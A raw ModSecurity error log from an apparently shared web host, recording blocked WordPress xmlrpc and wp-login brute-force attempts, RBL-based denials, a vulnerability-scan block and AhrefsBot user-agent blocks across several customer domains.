[Tue May 26 19:29:26.988313 2026] [security2:error] [pid 49598:tid 49824] [client 91.245.236.124:19567] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnPuzJzkdc0WtdrwtlLQAAAOU"]
[Tue May 26 19:29:26.988491 2026] [security2:error] [pid 49598:tid 49824] [client 91.245.236.124:19567] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnPuzJzkdc0WtdrwtlLQAAAOU"]
[Tue May 26 19:29:27.056276 2026] [security2:error] [pid 49598:tid 49739] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnPuzJzkdc0WtdrwtlJQAAAJA"]
[Tue May 26 19:29:27.748719 2026] [security2:error] [pid 49598:tid 49737] [client 91.245.236.124:61641] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnP-zJzkdc0WtdrwtlSQAAAI4"]
[Tue May 26 19:29:27.748830 2026] [security2:error] [pid 49598:tid 49737] [client 91.245.236.124:61641] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnP-zJzkdc0WtdrwtlSQAAAI4"]
[Tue May 26 19:29:28.513158 2026] [security2:error] [pid 49598:tid 49795] [client 91.245.236.124:21293] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQOzJzkdc0WtdrwtlWgAAAMg"]
[Tue May 26 19:29:28.513297 2026] [security2:error] [pid 49598:tid 49795] [client 91.245.236.124:21293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQOzJzkdc0WtdrwtlWgAAAMg"]
[Tue May 26 19:29:29.293619 2026] [security2:error] [pid 49598:tid 49812] [client 91.245.236.124:61581] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQezJzkdc0WtdrwtlcAAAANk"]
[Tue May 26 19:29:29.293750 2026] [security2:error] [pid 49598:tid 49812] [client 91.245.236.124:61581] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQezJzkdc0WtdrwtlcAAAANk"]
[Tue May 26 19:29:29.397236 2026] [security2:error] [pid 49598:tid 49791] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnQOzJzkdc0WtdrwtlZgAAAMQ"]
[Tue May 26 19:29:30.060235 2026] [security2:error] [pid 49598:tid 49828] [client 91.245.236.124:14597] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQuzJzkdc0WtdrwtlgQAAAOk"]
[Tue May 26 19:29:30.060372 2026] [security2:error] [pid 49598:tid 49828] [client 91.245.236.124:14597] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQuzJzkdc0WtdrwtlgQAAAOk"]
[Tue May 26 19:29:30.120388 2026] [security2:error] [pid 49598:tid 49790] [client 183.215.23.242:39050] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWnQezJzkdc0WtdrwtldQAAAMM"], referer: https://www.cagmedya.com/dijital-donusumde-profesyonel-web-tasarimi/
[Tue May 26 19:29:30.842564 2026] [security2:error] [pid 49598:tid 49814] [client 91.245.236.124:29069] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQuzJzkdc0WtdrwtlnQAAANs"]
[Tue May 26 19:29:30.842686 2026] [security2:error] [pid 49598:tid 49814] [client 91.245.236.124:29069] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQuzJzkdc0WtdrwtlnQAAANs"]
[Tue May 26 19:29:30.942249 2026] [security2:error] [pid 49598:tid 49760] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnQuzJzkdc0WtdrwtlkQAAAKU"]
[Tue May 26 19:29:31.256185 2026] [security2:error] [pid 49598:tid 49612] [remote 54.36.102.244:36200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWnQ-zJzkdc0WtdrwtlngAA7w0"]
[Tue May 26 19:29:31.609321 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:49833] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQ-zJzkdc0WtdrwtlqwAAAJ0"]
[Tue May 26 19:29:31.609441 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:49833] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnQ-zJzkdc0WtdrwtlqwAAAJ0"]
[Tue May 26 19:29:32.390805 2026] [security2:error] [pid 49598:tid 49786] [client 91.245.236.124:10661] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnROzJzkdc0WtdrwtlywAAAL8"]
[Tue May 26 19:29:32.390942 2026] [security2:error] [pid 49598:tid 49786] [client 91.245.236.124:10661] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnROzJzkdc0WtdrwtlywAAAL8"]
[Tue May 26 19:29:32.645875 2026] [security2:error] [pid 49598:tid 49755] [client 183.215.23.242:39342] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWnROzJzkdc0WtdrwtlzAAAAKA"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 19:29:33.116724 2026] [security2:error] [pid 49598:tid 49722] [remote 54.36.102.244:36200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWnRezJzkdc0Wtdrwtl3gABAHs"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 19:29:33.171723 2026] [security2:error] [pid 49598:tid 49768] [client 91.245.236.124:36997] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnRezJzkdc0Wtdrwtl3wAAAK0"]
[Tue May 26 19:29:33.171817 2026] [security2:error] [pid 49598:tid 49768] [client 91.245.236.124:36997] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnRezJzkdc0Wtdrwtl3wAAAK0"]
[Tue May 26 19:29:33.751658 2026] [security2:error] [pid 49598:tid 49732] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnRezJzkdc0Wtdrwtl5gAAAIk"]
[Tue May 26 19:29:33.934266 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:17299] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnRezJzkdc0Wtdrwtl8AAAAJw"]
[Tue May 26 19:29:33.934395 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:17299] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnRezJzkdc0Wtdrwtl8AAAAJw"]
[Tue May 26 19:29:34.710467 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:51525] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnRuzJzkdc0WtdrwtmBAAAAK4"]
[Tue May 26 19:29:34.710608 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:51525] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnRuzJzkdc0WtdrwtmBAAAAK4"]
[Tue May 26 19:29:35.139836 2026] [security2:error] [pid 49598:tid 49787] [client 139.99.237.62:46570] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWnRuzJzkdc0WtdrwtmAwAAAMA"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 19:29:35.182561 2026] [security2:error] [pid 49598:tid 49636] [remote 198.244.242.185:54620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "corporatecargosolutions.com"] [uri "/robots.txt"] [unique_id "ahWnR-zJzkdc0WtdrwtmDwAA2iU"]
[Tue May 26 19:29:35.182788 2026] [security2:error] [pid 49598:tid 49813] [client 198.244.242.185:54620] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "corporatecargosolutions.com"] [uri "/robots.txt"] [unique_id "ahWnR-zJzkdc0WtdrwtmDwAA2iU"]
[Tue May 26 19:29:35.470152 2026] [security2:error] [pid 49598:tid 49830] [client 91.245.236.124:20003] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnR-zJzkdc0WtdrwtmFgAAAOs"]
[Tue May 26 19:29:35.470262 2026] [security2:error] [pid 49598:tid 49830] [client 91.245.236.124:20003] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnR-zJzkdc0WtdrwtmFgAAAOs"]
[Tue May 26 19:29:36.232867 2026] [security2:error] [pid 49598:tid 49783] [client 91.245.236.124:25851] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnSOzJzkdc0WtdrwtmKwAAALw"]
[Tue May 26 19:29:36.233010 2026] [security2:error] [pid 49598:tid 49783] [client 91.245.236.124:25851] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnSOzJzkdc0WtdrwtmKwAAALw"]
[Tue May 26 19:29:36.373845 2026] [security2:error] [pid 49598:tid 49797] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnR-zJzkdc0WtdrwtmHwAAAMo"]
[Tue May 26 19:29:36.614521 2026] [security2:error] [pid 49598:tid 49638] [remote 54.39.89.100:31432] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "corporatecargosolutions.com"] [uri "/"] [unique_id "ahWnSOzJzkdc0WtdrwtmMwAAySc"]
[Tue May 26 19:29:36.614722 2026] [security2:error] [pid 49598:tid 49796] [client 54.39.89.100:31432] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "corporatecargosolutions.com"] [uri "/"] [unique_id "ahWnSOzJzkdc0WtdrwtmMwAAySc"]
[Tue May 26 19:29:36.998256 2026] [security2:error] [pid 49598:tid 49820] [client 91.245.236.124:44811] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnSOzJzkdc0WtdrwtmNwAAAOE"]
[Tue May 26 19:29:36.998348 2026] [security2:error] [pid 49598:tid 49820] [client 91.245.236.124:44811] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnSOzJzkdc0WtdrwtmNwAAAOE"]
[Tue May 26 19:29:37.775988 2026] [security2:error] [pid 49598:tid 49781] [client 91.245.236.124:58833] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnSezJzkdc0WtdrwtmVwAAALo"]
[Tue May 26 19:29:37.776116 2026] [security2:error] [pid 49598:tid 49781] [client 91.245.236.124:58833] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnSezJzkdc0WtdrwtmVwAAALo"]
[Tue May 26 19:29:37.966823 2026] [security2:error] [pid 49598:tid 49807] [client 138.59.207.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnSezJzkdc0WtdrwtmXQAAANQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:29:38.018457 2026] [security2:error] [pid 49598:tid 49815] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnSezJzkdc0WtdrwtmSgAAANw"]
[Tue May 26 19:29:38.624168 2026] [security2:error] [pid 49598:tid 49785] [client 91.245.236.124:63167] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnSuzJzkdc0WtdrwtmcAAAAL4"]
[Tue May 26 19:29:38.624320 2026] [security2:error] [pid 49598:tid 49785] [client 91.245.236.124:63167] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnSuzJzkdc0WtdrwtmcAAAAL4"]
[Tue May 26 19:29:39.046145 2026] [security2:error] [pid 49598:tid 49802] [client 138.59.207.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnSuzJzkdc0WtdrwtmfAAAAM8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 19:29:39.306231 2026] [security2:error] [pid 49598:tid 49623] [remote 74.7.241.58:51386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWnS-zJzkdc0WtdrwtmhgAAwBg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-includes
[Tue May 26 19:29:39.400380 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:30619] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnS-zJzkdc0WtdrwtmhwAAAP8"]
[Tue May 26 19:29:39.400516 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:30619] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnS-zJzkdc0WtdrwtmhwAAAP8"]
[Tue May 26 19:29:39.868131 2026] [security2:error] [pid 49598:tid 49627] [remote 54.36.102.244:47576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWnS-zJzkdc0WtdrwtmkgAApRw"]
[Tue May 26 19:29:40.074993 2026] [security2:error] [pid 49598:tid 49835] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnS-zJzkdc0WtdrwtmiwAAAPA"]
[Tue May 26 19:29:40.166676 2026] [security2:error] [pid 49598:tid 49815] [client 91.245.236.124:17527] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnTOzJzkdc0WtdrwtmlwAAANw"]
[Tue May 26 19:29:40.166781 2026] [security2:error] [pid 49598:tid 49815] [client 91.245.236.124:17527] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnTOzJzkdc0WtdrwtmlwAAANw"]
[Tue May 26 19:29:40.315869 2026] [security2:error] [pid 49598:tid 49626] [remote 54.36.102.244:47576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWnTOzJzkdc0WtdrwtmnQAAlRs"], referer: https://moes-art.com/wp-login.php
[Tue May 26 19:29:40.875333 2026] [security2:error] [pid 49598:tid 49617] [remote 142.44.220.182:63258] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "fonefix.in"] [uri "/robots.txt"] [unique_id "ahWnTOzJzkdc0WtdrwtmrgAAzxI"]
[Tue May 26 19:29:40.875584 2026] [security2:error] [pid 49598:tid 49802] [client 142.44.220.182:63258] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "fonefix.in"] [uri "/robots.txt"] [unique_id "ahWnTOzJzkdc0WtdrwtmrgAAzxI"]
[Tue May 26 19:29:40.927752 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:10601] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnTOzJzkdc0WtdrwtmsgAAAOc"]
[Tue May 26 19:29:40.927904 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:10601] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnTOzJzkdc0WtdrwtmsgAAAOc"]
[Tue May 26 19:29:41.007708 2026] [security2:error] [pid 49598:tid 49639] [remote 42.194.184.145:41660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.184.194.42.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWnTOzJzkdc0WtdrwtmrQAAlyg"]
[Tue May 26 19:29:41.164149 2026] [security2:error] [pid 49598:tid 49610] [remote 121.200.216.55:45722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWnTOzJzkdc0WtdrwtmswAA8Qs"]
[Tue May 26 19:29:41.710498 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:31165] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnTezJzkdc0WtdrwtmzAAAANo"]
[Tue May 26 19:29:41.710751 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:31165] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnTezJzkdc0WtdrwtmzAAAANo"]
[Tue May 26 19:29:41.823529 2026] [security2:error] [pid 49598:tid 49620] [remote 78.142.18.172:36588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnTezJzkdc0WtdrwtmygAAtxU"]
